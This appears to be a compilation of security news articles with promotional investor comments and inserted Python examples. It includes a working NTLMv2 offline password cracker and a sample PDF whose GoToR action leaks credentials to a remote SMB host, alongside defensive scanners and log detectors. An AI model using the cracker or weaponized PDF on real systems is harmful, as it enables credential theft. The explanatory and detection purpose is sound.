Antivirus is particularly bad at catching ransomware, one of the biggest new threats that companies face. In a March 2017 survey of 500 organizations, anti-phishing vendor KnowBe4 found that only 52 percent of companies were able to thwart a simulated ransomware attack. For the rest, the ransomware was able to get past their antivirus defenses.
A newer technique called Process Doppelgänging abuses the transactions feature of Windows' NTFS file system (Transactional NTFS). It lets malware write its payload into a file inside a transaction, map the result into memory, and roll the transaction back, so the file on disk never shows the malicious content that security software would scan. "From a technical perspective, [our] research shows that correct file scan engines are hard to get right and specifically, that correct handling of transactions is even harder," says Udi Yavo, a researcher at enSilo, which discovered Process Doppelgänging.
"However, I think the main takeaway of this research is that having a single line of defense is not enough, and sometimes even small tricks can lead to bypasses, even in mature products. Enterprises should move to solutions that can block fileless attacks and are effective in both pre- and post-execution scenarios,” says Yavo.
NSS Labs has also been running tests of both traditional and next-generation endpoint protection tools. In its latest rounds of testing the company has focused only on vendors that have advanced detection capabilities. Last year, when testing included signature-only vendors as well, the traditional products did poorly. "A number of products scored in the 90s," says NSS Lab's Spanbauer, "But none of those were sole traditional antivirus."
The problem is compounded if the new threats are designed to spread quickly in a company and do as much damage as fast as possible, and compounded again if enterprises delay rolling out antivirus updates. In addition, the amount of malware is growing exponentially, according to AV-Test, so even if a particular product has a high detection rate, more and more malware in absolute terms is going to slip through. Plus, if the attackers notice that a particular kind of malware is getting through, they can double-down on it.
These four factors combined have helped propel the recent WannaCry ransomware to more than 400,000 infected devices and potential total financial impact of as much as $8 billion. That doesn't mean that traditional antivirus is completely obsolete. It still has a place in the enterprise, experts say, because it is very effective at spotting and blocking known threats quickly, efficiently and with minimum human intervention. Plus, traditional antivirus is a compliance or customer requirement in some industries.
The case for traditional antivirus
One company that doesn't have a choice about whether to use traditional antivirus is Emeryville, Calif.-based National Mortgage Insurance Corp. "Our customers are banks, and many require a traditional signature-based antivirus as part of the defense we have in place," says Bob Vail, the company's director of information security.
Sophos, the company's antivirus vendor, has a good detection record and is very lightweight, he says. That makes it a good first round of defense, but Vail says he knows that's not enough. "Antivirus in general is going to be after-the-fact," he says. "Someone has to be infected and a signature developed and hopefully everyone else gets protected before they get attacked."
The company also has a second level of protection in place to guard against the malware that gets through, a behavior-based system from enSilo. The two products work well together, Vail says. "If a known virus comes down, Sophos will quarantine the file before it gets a chance to execute," he says. "But those things that get past it, enSilo will prosecute those, so it's a classic defense at depth."
Traditional antivirus is a good adjunct to the newer technologies such as those that involve behavior analytics, sandboxing, and machine learning. The more advanced tools can require more processing power, which can slow down computers. If the product runs behavioral or other tests on potential threats before permitting user access, it can impact productivity. If the product allows the threats through, then tests them separately, malware has a window of opportunity to get access to enterprise systems.
Finally, when a new threat is detected, additional work is required to mitigate the threat and generate signatures to protect against the threat in the future. "The first level of defense will always be some kind of signature-based defense," says Raja Patel, VP for corporate product at McAfee LLC. "If you already know something is bad, why do an additional layer of protection against it?"
Without that initial signature-based screening, companies will have to spend a lot more time, effort and money to handle all the threats that come in, he says. "You can imagine how much a security team would have to put up with." If a threat can be caught and stopped right out of the gate, it's the cheapest option. "Signature-based antivirus saves human effort and reduces false positives and time delays," he says. "It's a fantastic first layer, and will be for a long time."
Traditional, next-gen tools are converging
As the industry matures, enterprises are going to be able to get the full-suite of malware protection tools from a single vendor, if they don't already. Traditional antivirus providers are adding next-gen capabilities, while the next-generation vendors are including signature-based protections in their suites.
Endpoint security startup CrowdStrike, for example, launched its all-in-one Falcon platform three years ago, allowing customers such as the Center for Strategic and International Studies, a Washington, DC, think tank, to get everything in one place. "We had CrowdStrike already in place and were relying on it as part of endpoint security," says Ian Gottesman, the organization's CIO. "Extending that solution to include antivirus was advantageous for CSIS. I would recommend any other organizations do the same."
According to a survey released in 2017 by the SANS Institute, about 95 percent of respondents expect to see antivirus protection included in their next-generation endpoint solution. Traditional antivirus vendors aren't sitting on the sidelines, either.
Instead, many are buying or building the next-generation tools that can help catch the attacks that get by signature-based defenses. "Antivirus will become extinct in the next few years unless they are able to evolve," says Luis Corrons, PandaLabs technical director at Panda Security, a traditional antivirus vendor. "We at Panda have been fully aware of this."
The company has been doing behavior-based malware detection for several years, but even that is not enough. Many successful security breaches involve no malicious software at all, he says. "To say it crystal clear, a traditional antivirus is useless against these attacks as there is no malware involved," he says. For example, attackers can take advantage of existing non-malicious software.
The company has recently rolled out new tools to monitor the behavior of all active applications in an enterprise. "It allows us to have full visibility of what is happening in our network," he says.
McAfee has also added on new layers of protection, says McAfee's Patel. "Signature-based defenses will protect you after you know about the threats, but they won't protect patient zero and the time period after infection and when you wrote the signatures," he says. "We added two new protection capabilities last year -- machine learning and dynamic application containment."
Why some companies still rely on traditional antivirus alone
Ransomware infection rates show that many companies still lack adequate endpoint protection. According to an IBM survey, nearly half of all companies fell victim to ransomware in 2016, with 70 percent of them deciding to pay the ransom.
Small firms are also hit and, unlike the largest enterprises, may not be taking endpoint protection as seriously. A 2017 survey by the Ponemon Institute showed that 51 percent of small and medium-sized businesses have experienced a ransomware attack, but, despite that, 57 percent say that they are "too small" to be targets for ransomware.
According to a May 2017 report by endpoint protection vendor VIPRE Security, 48 percent of IT managers at small and medium-sized enterprises say that a company of their size doesn't need endpoint security with advanced malware defense capabilities.
That's a mistake, says NSS Labs' Spanbauer. There are so many good options available on the market today, and very competitive pricing, that no company should be using signature-based antivirus and nothing else, he says. "There is not a price or protection argument that can be made that would make traditional antivirus the first choice or the preferred recommendation for any specific environment." More comprehensive protection is easier to find than ever before, with even entry-level products offering advanced controls, he adds. "It's hard to find a strict signature-only antivirus product these days."
PDF Files Can Be Abused to Steal Windows Credentials
Wave VSC 2.0 could be a good preventative measure in that the second factor makes the credentials essentially worthless to a hacker. imo.
https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/
PDF files can be weaponized by malicious actors to steal Windows credentials (NTLM hashes) without any user interaction, simply by opening a file, according to Assaf Baharav, a security researcher with cyber-security firm Check Point.
Baharav published research this week showing how a malicious actor could take advantage of features natively found in the PDF standard to leak NTLM hashes, the password-derived authentication material that Windows uses for network log-ons.
"The PDF specification allows loading remote content for the GoToE & GoToR entries," Baharav told Bleeping Computer today.
Stealing Windows credentials via PDF and SMB
For his research, Baharav created a PDF document that would utilize these two PDF functions. When someone would open this file, the PDF document would automatically make a request to a remote malicious SMB server.
By design, the Windows SMB client authenticates to whatever server it is pointed at, so the reader's request carries an NTLM challenge-response (loosely called the NTLM hash) computed from the user's password hash and the server's challenge. The malicious server simply logs it. Tools are available that can crack this response offline to recover the original password, and it can also be relayed to other services that accept NTLM.
This type of attack is not new at all; in the past it has been executed by initiating SMB requests from Office documents, Outlook, browsers, Windows shortcut files, shared folders, and other Windows OS internal functions.
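What the rogue SMB server actually captures is worth seeing in code, because it explains why the leak matters even though no password leaves the machine. The following is an added example, not Check Point's proof of concept: it derives the NT hash (MD4 of the UTF-16LE password), computes the NTLMv2 proof the way a Windows client does for a given server challenge and client blob, and then recovers the password from a captured proof by trying word-list candidates. The user name, domain, challenge, blob and word list are constructed, and MD4 is implemented inline because many OpenSSL builds no longer expose it through hashlib.

```python
"""NTLMv2 challenge/response: what a rogue SMB server captures, and how it is cracked.

Added example, not Check Point's proof of concept. MD4 is implemented inline
(RFC 1320) because many hashlib builds no longer provide it; the user, domain,
server challenge, client blob and word list below are all constructed.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; the Windows NT hash is MD4 of the UTF-16LE password."""
    def rotl(v, n):
        return ((v << n) | (v >> (32 - n))) & _MASK

    rounds = (  # (mixing function, additive constant, X[] index order, shift pattern)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                t = (-i) % 4                          # register updated: a, d, c, b, a, ...
                u, v, w = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = rotl((s[t] + fn(u, v, w) + words[idx] + k) & _MASK, shifts[i % 4])
        state = [(p + q) & _MASK for p, q in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """What Windows stores for the account; never sent over the wire by NTLMv2."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr as the client computes it (MS-NLMP 3.3.2). The wire response is
    NTProofStr || client_blob, a keyed MAC over a challenge the attacker chose."""
    ntlmv2_key = hmac.new(nt_hash(password),
                          (user.upper() + domain).encode("utf-16le"),
                          hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + client_blob, hashlib.md5).digest()


def crack_ntlmv2(captured_proof: bytes, user: str, domain: str,
                 server_challenge: bytes, client_blob: bytes,
                 wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the attacker knows the challenge (it chose it) and
    the blob (sent in clear), so each guess costs one MD4 plus two HMAC-MD5s."""
    for candidate in wordlist:
        guess = ntlmv2_proof(candidate, user, domain, server_challenge, client_blob)
        if hmac.compare_digest(guess, captured_proof):
            return candidate
    return None


# Constructed capture. A real blob carries a timestamp, client nonce and target
# info; its exact content does not matter for the cracking step.
USER, DOMAIN = "jdoe", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011")
CAPTURED_PROOF = ntlmv2_proof("Summer2018!", USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB)
WORDLIST = ["password", "Welcome1", "Summer2018!", "letmein"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("captured NTProofStr  :", CAPTURED_PROOF.hex())
    print("recovered password   :", crack_ntlmv2(CAPTURED_PROOF, USER, DOMAIN,
                                                  SERVER_CHALLENGE, CLIENT_BLOB, WORDLIST))
```

Because the proof is keyed by the NT hash rather than by the password text, a long random password is the only thing that makes this capture useless; a short or guessable one falls to exactly the loop above, run at GPU speed by the usual tools.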
All PDF readers are most likely vulnerable
Now, Baharav has shown that PDF files are just as dangerous. The Check Point researcher told Bleeping Computer that he only field-tested the attack on Adobe Acrobat and FoxIT Reader.
"We chose to test these two high profile PDF readers," Baharav told us. "Regarding the others, we highly suspect they may be vulnerable as well."
"We followed a 90 days disclosure policy by notifying only Adobe and Foxit regarding the issues," Baharav says.
While FoxIT did not reply, Adobe said it doesn't plan to modify its software, deferring to Windows OS-level mitigations. Adobe engineers were referring to Microsoft Security Advisory ADV170014, released in October 2017.
Microsoft released ADV170014 to provide a technical mechanism and instructions on how users could disable NTLM SSO authentication on Windows operating systems, in the hopes of stopping the theft of NTLM hashes via SMB requests made to servers located outside the local network.
"The best practice here is to follow Microsoft optional security enhancement," Baharav told us.
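Where the Windows-side mitigation cannot be rolled out everywhere, a mail gateway or endpoint can at least refuse PDFs that carry the triggering actions. The scanner below is an added example (not Check Point's code): it finds GoToR/GoToE action dictionaries in the raw file, pulls out their /F target, and flags UNC paths and URLs. The one-page sample PDF is constructed, and the host 10.0.0.5 in its UNC path is an assumption.

```python
"""Flag PDF actions that would make a reader fetch a remote (UNC or URL) file.

Added example, not Check Point's tooling. It scans the raw bytes for GoToR/GoToE
actions and extracts their /F target; the sample document is constructed and
its UNC path points at an assumed host, 10.0.0.5.
"""
import re
from typing import List

ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# /F (literal string): PDF literals escape backslash and parentheses with '\'.
LITERAL_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)")
URL_SPEC_RE = re.compile(rb"/FS\s*/URL")        # file specification of type URL


def unescape_literal(raw: bytes) -> str:
    """Resolve the simple backslash escapes used in file-specification strings."""
    return re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")


def is_remote_target(target: str) -> bool:
    """UNC paths (two leading backslashes or slashes) and URLs leave the machine."""
    return target.startswith("\\\\") or target.startswith("//") or "://" in target


def find_remote_actions(pdf: bytes) -> List[dict]:
    """Return one record per GoToR/GoToE action found in the raw bytes."""
    findings = []
    for m in ACTION_RE.finditer(pdf):
        # Scope the target search to the enclosing object: back to the nearest
        # 'obj' keyword, forward to the next 'endobj'.
        start = pdf.rfind(b"obj", 0, m.start())
        end = pdf.find(b"endobj", m.end())
        body = pdf[max(start, 0):(end if end >= 0 else len(pdf))]
        lit = LITERAL_RE.search(body)
        target = unescape_literal(lit.group(1)) if lit else None
        remote = (target is not None and is_remote_target(target)) or bool(URL_SPEC_RE.search(body))
        findings.append({"action": m.group(1).decode("ascii"), "target": target, "remote": remote})
    return findings


def is_suspicious(pdf: bytes) -> bool:
    """True if any GoToR/GoToE action points off the local machine."""
    return any(f["remote"] for f in find_remote_actions(pdf))


# Constructed sample: the catalog's /OpenAction is a GoToR to a UNC path, so the
# reader tries to open \\10.0.0.5\share\x.pdf, and authenticates, as soon as it loads.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /S /GoToR /F (\\\\10.0.0.5\\share\\x.pdf) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for finding in find_remote_actions(SAMPLE_PDF):
        print(finding)
    print("suspicious:", is_suspicious(SAMPLE_PDF))
```

The raw-byte scan is deliberately simple: it will not see actions stored inside compressed object streams or encrypted documents, so a production check should inflate streams with a proper PDF parser first. It complements, rather than replaces, blocking outbound TCP 445 at the perimeter and applying the ADV170014 setting.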
Massive phishing campaign targets half a billion users in the first quarter 2018
Things like Windows login ids, passwords, and bank ids and passwords could all be protected by two factor authentication. Wave and its simple to use, elite and creative products (both retired and current) could play a huge role in protecting users against phishing attacks.
https://www.scmagazine.com/massive-phishing-campaign-targets-half-a-billion-users-in-the-first-quarter-2018/article/761541/
A massive phishing campaign has targeted more than 550 million email users globally since the first quarter of 2018.
Vade Secure security researchers first spotted the campaign in early January with a high concentration of impacted email users include the U.S., U.K., France, Germany, and the Netherlands, according to a recent blog post.
The attacks managed to fly under the radar, undetected by many existing email security solutions, because the phishing emails use IP addresses, servers, and domain names that appear to be leased and therefore legitimate.
Threat actors are also using URL-shortening tools and chaining several hundred URLs together in order to hide the final destination and jam detection tools, researchers said.
The attacks are likely being carried out by a serious criminal organization, as the infrastructure required to operate at this scale costs tens of thousands of dollars.
The emails masquerade as popular brands, online streaming services, and telecom operators based on the country of the recipients and are designed to steal users' bank account details by offering them a coupon or discount in exchange for participating in a quiz or online contest.
“The number of unique malwares caught by our filter exceeded the number of unique phishing emails throughout 2017, spiking in November,” researchers said in the post. “With the launch of this new attack in January 2018, however, unique phishing emails surged past malware. In fact, the ratio of phishing to malware was nearly 21:1 in Q1 2018.”
In order to prevent falling for the attacks researchers recommend users remain vigilant even if the email message appears to be coming from a familiar brand and never click the links within suspicious emails.
5 signs you've been hit with an advanced persistent threat (APT)
This article highlights the damages of APTs and Wave's products could mitigate the damages caused by APTs. Wave VSC 2.0, Wave Endpoint Monitor and known devices could play an important role in stopping these APT attacks. imo.
https://www.csoonline.com/article/2615666/security/security-5-signs-you-ve-been-hit-with-an-advanced-persistent-threat.html#tk.twt_cso
Do you have valuable data on your network? Noticing odd network behavior? You could be the victim of an APT attack
Advanced persistent threat (APT) hackers and malware are more prevalent and sophisticated than ever. APTs are professional hackers, working either for their government or relevant industries, whose full-time job is to hack specific companies and targets. They perform actions relevant to their sponsor’s interests, which can include accessing confidential information, planting destructive code, or placing hidden backdoor programs that allow them to sneak back into the target network or computer at-will.
APT hackers are very skilled and have the huge operational advantage in that they will never be arrested. Imagine how much more successful and persistent any other thief might be if they could get the same guarantee.
Still, they don’t want their activities to be immediately noticed by their targets, because it would complicate their mission. A successful APT breaks into networks and computers, gets what they need, and slips out unnoticed. They prefer to be “slow and low.” They don’t want to generate a lot of strange-looking auditable events, error messages, or traffic congestion, or to cause service disruptions.
Most APTs use custom code to do their activities, but prefer, at least at first, to use publicly known vulnerabilities to do their dirty work. That way, if their activities are noticed, it’s harder for the victim to realize that it’s an APT versus the regular, less serious, hacker or malware program.
With that said, how can you recognize something that’s meant to be silent and unnoticed?
Recognizing an APT
Because APT hackers use different techniques from ordinary hackers, they leave behind different signs. Over the past two decades, I've discovered the following five signs are most likely to indicate that your company has been compromised by an APT. Each could be part of legitimate actions within the business, but their unexpected nature or the volume of activity may bear witness to an APT exploit.
1. Increase in elevated log-ons late at night
APTs rapidly escalate from compromising a single computer to taking over multiple computers or the whole environment in just a few hours. They do this by reading an authentication database, stealing credentials, and reusing them. They learn which user (or service) accounts have elevated privileges and permissions, then go through those accounts to compromise assets within the environment. Often, a high volume of elevated log-ons occur at night because the attackers live on the other side of the world. If you suddenly notice a high volume of elevated log-ons across multiple servers or high-value individual computers while the legitimate work crew is at home, start to worry.
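A detection for this first sign, written as an added example (it is not part of the CSO article): it parses privileged log-on events, ignores anything during business hours, and alerts only when one account reaches several distinct machines within the same off-hours clock hour, which separates the lateral-movement pattern from a single late login. The event lines are constructed in a simplified form (4672 is Windows' "special privileges assigned to new logon" event); the 07:00 to 19:00 business window and the three-host threshold are assumptions to tune.

```python
"""Sign 1: privileged log-ons fanning out across hosts outside business hours.

Added example. Event lines are constructed in a simplified
'date time event_id account host' layout (4672 = special privileges assigned);
the business-hours window and the fan-out threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

PRIVILEGED_LOGON_EVENT = "4672"


def parse_events(text: str) -> List[Tuple[datetime, str, str, str]]:
    """Return (timestamp, event_id, account, host) tuples, skipping comments/blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        date, time, event_id, account, host = line.split()
        events.append((datetime.fromisoformat(f"{date}T{time}"), event_id, account, host))
    return events


def is_off_hours(ts: datetime, start_hour: int = 7, end_hour: int = 19) -> bool:
    """Business hours are [start_hour, end_hour) in the log's own time zone."""
    return not (start_hour <= ts.hour < end_hour)


def find_offhours_fanout(events, min_hosts: int = 3) -> List[Dict]:
    """Flag accounts whose off-hours privileged log-ons touch >= min_hosts
    distinct machines within one clock hour."""
    hosts_by_bucket: Dict[Tuple[str, datetime], Set[str]] = defaultdict(set)
    for ts, event_id, account, host in events:
        if event_id != PRIVILEGED_LOGON_EVENT or not is_off_hours(ts):
            continue
        bucket = ts.replace(minute=0, second=0, microsecond=0)
        hosts_by_bucket[(account, bucket)].add(host)
    alerts = []
    for (account, bucket), hosts in sorted(hosts_by_bucket.items()):
        if len(hosts) >= min_hosts:
            alerts.append({"account": account, "hour": bucket.isoformat(),
                           "hosts": sorted(hosts)})
    return alerts


# Constructed sample: a daytime patching sweep (benign), one ordinary late
# interactive logon, and a service account hopping four servers at 02:00.
SAMPLE_EVENTS = """\
# date       time     id   account          host
2018-05-01 10:05:12 4672 CORP\\patchadmin  SRV01
2018-05-01 10:06:40 4672 CORP\\patchadmin  SRV02
2018-05-01 10:07:55 4672 CORP\\patchadmin  SRV03
2018-05-01 10:09:03 4672 CORP\\patchadmin  SRV04
2018-05-01 23:41:10 4624 CORP\\jdoe        WS-117
2018-05-02 02:13:44 4672 CORP\\svc_backup  SRV01
2018-05-02 02:15:02 4672 CORP\\svc_backup  DC01
2018-05-02 02:15:30 4672 CORP\\svc_backup  FS02
2018-05-02 02:19:58 4672 CORP\\svc_backup  SQL01
2018-05-02 02:40:11 4672 CORP\\svc_backup  SRV01
"""

if __name__ == "__main__":
    for alert in find_offhours_fanout(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

In practice the window should follow each site's local time and the threshold should be learned per account class: a backup service account legitimately touching many hosts at night is the first false positive this rule produces, which is exactly the kind of baseline the article asks you to establish before an incident.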
2. Widespread backdoor Trojans
APT hackers often install backdoor Trojan programs on compromised computers within the exploited environment. They do this to ensure they can always get back in, even if the captured log-on credentials are changed when the victim gets a clue. Another related trait: Once discovered, APT hackers don't go away like normal attackers. Why should they? They own computers in your environment, and you aren't likely to see them in a court of law.
These days, Trojans deployed through social engineering provide the avenue through which most companies are exploited. They are fairly common in every environment, and they proliferate in APT attacks.
3. Unexpected information flows
Look for large, unexpected flows of data from internal origination points to other internal computers or to external computers. It could be server to server, server to client, or network to network.
Those data flows might also be limited, but targeted -- such as someone picking up email from a foreign country. I wish every email client had the ability to show where the latest user logged in to pick up email and where the last message was accessed. Gmail and some other cloud email systems already offer this.
This has become harder to do because so much of today's traffic is encrypted, usually as HTTP over TLS (HTTPS) or inside VPN tunnels. Although this used to be rare, many companies now block or intercept all previously undefined and unapproved HTTPS traffic at a security inspection chokepoint. The device “unwraps” the HTTPS traffic by substituting its own TLS certificate and acting as a proxy that pretends to be the other side of the transaction to both source and destination. It decrypts and inspects the traffic, then re-encrypts the data before sending it on to the original endpoints. If you’re not doing something like this, you’re going to miss the exfiltrated data.
Of course, to detect a possible APT, you have to understand what your data flows look like before your environment is compromised. Start now and learn your baselines.
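One way to turn "learn your baselines" into a concrete check, as an added example rather than anything from the article: score each host's latest day of outbound bytes against its own earlier days using the median and median absolute deviation (which a single busy day does not skew), and alert only when the day is both unusual for that host and above an absolute floor, so a quiet workstation does not page anyone over a few extra megabytes. The per-day flow totals are constructed, and the multiplier and floor are assumptions to tune per environment.

```python
"""Sign 3: learn per-host egress baselines, then flag days that break them.

Added example. Flow records are constructed ('date src_ip bytes_out', already
summed per day as a firewall or proxy export would give); the robust z-score
multiplier and the absolute floor are assumptions to tune per environment.
"""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

MB = 1_000_000


def daily_egress(text: str) -> Dict[str, List[Tuple[str, int]]]:
    """Group 'date src bytes' lines into {src: [(date, bytes), ...]} in date order."""
    per_src = defaultdict(list)
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        date, src, nbytes = line.split()
        per_src[src].append((date, int(nbytes)))
    return {src: sorted(days) for src, days in per_src.items()}


def flag_egress_anomalies(text: str, k: float = 6.0, floor: int = 500 * MB,
                          min_baseline_days: int = 3) -> List[Dict]:
    """Score each source's most recent day against its earlier days.

    threshold = median + k * MAD (with a small fraction of the median as a
    guard when the MAD is zero); a day is flagged only if it exceeds both the
    threshold and the absolute floor.
    """
    alerts = []
    for src, days in daily_egress(text).items():
        if len(days) <= min_baseline_days:
            continue                                  # not enough history yet
        baseline = [b for _, b in days[:-1]]
        date, latest = days[-1]
        med = statistics.median(baseline)
        mad = statistics.median(abs(b - med) for b in baseline)
        threshold = med + k * max(mad, 0.01 * med)
        if latest > threshold and latest > floor:
            alerts.append({"src": src, "date": date, "bytes": latest,
                           "baseline_median": med, "threshold": int(threshold)})
    return alerts


# Constructed sample: a workstation that suddenly ships 3.2 GB, a backup server
# that always moves ~900 MB (noisy but normal), and a quiet host whose jump is
# real in relative terms but too small to matter.
SAMPLE_FLOWS = """\
# date       src        bytes_out
2018-04-30   10.1.4.22   48000000
2018-05-01   10.1.4.22   52000000
2018-05-02   10.1.4.22   45000000
2018-05-03   10.1.4.22   61000000
2018-05-04   10.1.4.22   3200000000
2018-04-30   10.1.9.5    900000000
2018-05-01   10.1.9.5    880000000
2018-05-02   10.1.9.5    950000000
2018-05-03   10.1.9.5    910000000
2018-05-04   10.1.9.5    960000000
2018-04-30   10.1.7.3    2000000
2018-05-01   10.1.7.3    2000000
2018-05-02   10.1.7.3    2000000
2018-05-03   10.1.7.3    2000000
2018-05-04   10.1.7.3    90000000
"""

if __name__ == "__main__":
    for alert in flag_egress_anomalies(SAMPLE_FLOWS):
        print(alert)
```

The same scoring works per (source, destination) pair or per destination country once the flow export carries those fields; the important part is that the baseline is built from the environment's own history before anything is suspected, not from a vendor default.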
4. Unexpected data bundles
APTs often aggregate stolen data to internal collection points before moving it outside. Look for large (gigabytes, not megabytes) chunks of data appearing in places where that data should not be, especially if compressed in archive formats not normally used by your company.
5. Focused spear-phishing campaigns
If I had to think of one of the best indicators, it would be focused spear-phishing email campaigns against a company's employees using document files (e.g., Adobe Acrobat PDFs, Microsoft Office Word, Microsoft Office Excel XLS, or Microsoft Office PowerPoint PPTs) containing executable code or malicious URL links. This is the original causative agent in the vast majority of APT attacks.
The most important sign is that the attacker’s phish email is not sent to everyone in the company, but instead to a more selective target of high-value individuals (e.g., CEO, CFO, CISO, project leaders, or technology leaders) within the company, often using information that could only have been learned by intruders that had already previously compromised other team members.
The emails might be fake, but they contain keywords referring to real internal, currently ongoing projects and subjects. Instead of some generic, “Hey, read this!” phishing subject, they contain something very relevant to your ongoing project and come from another team member on the project. If you’ve ever seen one of these very specific, targeted phishing emails, you’ll usually end up shuddering a bit because you’ll question yourself about whether you could have avoided it. They are usually that good.
If you hear of a focused spear-phishing attack, especially if a few executives have reported being duped into clicking on a file attachment, start looking for the other four signs and symptoms. It may be your canary in the coal mine.
That said, I hope you never have to face cleaning up from an APT attack. It's one of the hardest things you and your enterprise can do. Prevention and early detection will reduce your suffering.
WidePoint Awarded Follow-On Federal Contracts for Identity Management Credentialing Services
Wave at one time was involved with this. Maybe they will be again in the future.
https://www.prnewswire.com/news-releases/widepoint-awarded-follow-on-federal-contracts-for-identity-management-credentialing-services-300633789.html
MCLEAN, Va., April 23, 2018 /PRNewswire/ -- WidePoint Corporation (NYSE American: WYY), a leading provider of Trusted Mobility Management (TM2) specializing in Telecommunications Lifecycle Management (TLM) and Cybersecurity solutions, today announced four follow-on federal contract awards valued at more than $770,000 to provide Identity Management (IdM) services including certificate issuance and credentialing.
Caroline Godfrey, Chief Security Officer, WidePoint Cybersecurity Solutions Corporation, stated, "WidePoint has been an approved and trusted issuer of U.S. Government strong authentication credentials since 1999 and a provider of IdM credentialing services since 2006. WidePoint is honored by these contract renewals and looks forward to continuing to deliver our demonstrated superior services for agencies across the federal government."
"Identity management is a cornerstone of WidePoint's Trusted Mobility Management (TM2) Framework," said Mr. Jin Kang, Chief Executive Officer of WidePoint Corporation. "WidePoint has developed a unique and highly customizable approach for deploying PIV-I credentials that provides enhanced security and compliance."
Jason Holloway, President and Chief Executive Officer of WidePoint Cybersecurity Solutions Corporation, stated, "WidePoint is excited to develop new opportunities through our validation, authentication and credentialing contracts to showcase how TM2 provides complete end-to-end authentication and management for the mobile environment."
Companies are stopping more cyber attacks, but have room to improve defenses, survey shows
How about a successful prevention rate closer to 100%? 100% TPMs turned on in computers could be the 'new' technology these companies need.
https://www.cyberscoop.com/accenture-cyberattacks-companies-survey-2018/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=70344199&utm_medium=social&utm_source=twitter
Big companies might experience more cyberattacks now than they did a year ago, but they are becoming more successful at blocking them, according to a new survey by global consultancy Accenture.
The survey found that 87 percent of focused cyberattacks are prevented, compared to 70 percent reported in a similar study a year ago, but the success rate could go even higher, Accenture said. Less than half of the surveyed companies are using technologies like artificial intelligence, machine learning and automation in the fight, the survey found.
“Only one in eight focused cyberattacks are getting through versus one in three last year, indicating that organizations are doing a better job of preventing data from being hacked, stolen or leaked,” Kelly Bissell, managing director of Accenture Security, said in a press release Monday. “While the findings of this study demonstrate that organizations are performing better at mitigating the impact of cyberattacks, they still have more work to do.”
For the report, “Gaining Ground on the Cyber attacker: 2018 State of Cyber Resilience,” Accenture canvassed 4,600 enterprise security practitioners that represent companies with revenues of $1 billion or more in 15 countries.
More than 80 percent of respondents agreed that acquiring new technology is essential to securing the future of organizations.
“Building investment capacity for wise security investments must be a priority for those organizations who want to close the gap on successful attacks even further,” Bissell said. “For business leaders who continue to invest in and embrace new technologies, reaching a sustainable level of cyber resilience could become a reality for many organizations in the next two to three years. That’s an encouraging projection.”
Breaching critical systems a simple task for today's hackers
If the government and companies turned on the TPM in 100% of their computers and used products from Wave, they'd have vastly improved security. imo. And they wouldn't have to wait 200-300 days to know if an unknown device tried to penetrate their networks.
http://thehill.com/opinion/cybersecurity/384137-breaching-critical-systems-a-simple-task-for-todays-hackers
While most of Capitol Hill was focused on Mark Zuckerberg’s testimony last week regarding privacy settings and his business model, the other key policy priority of our technological era went unaddressed: cybersecurity and the threat posed by hackers, cybercriminals and cyberterrorists.
Government information systems are of considerable concern to the welfare of the country. With significant breaches including the U.S. Voter Database, National Archives and Records Administration, and Office of Personnel Management (OPM) over the past decade — not to mention many breaches at the state and local level — it’s safe to say that the public has moved beyond surprise when a new attack hits the news.
Nearly everyone (including this writer) was intimately impacted by the OPM breach; it goes without saying how a compromise to voting records and technology could affect the nation. Because of these concerns, I tend to view cybersecurity research with keen interest in how the government stacks up against other industries.
As congressional leaders in both chambers review and rethink America’s cyber defense posture, it’s critical that we know what we are up against. It’s not hyperbole to say that we are at war with bad actors in our connected world, and we need to follow Sun Tzu’s timeless military philosophy and know our enemy.
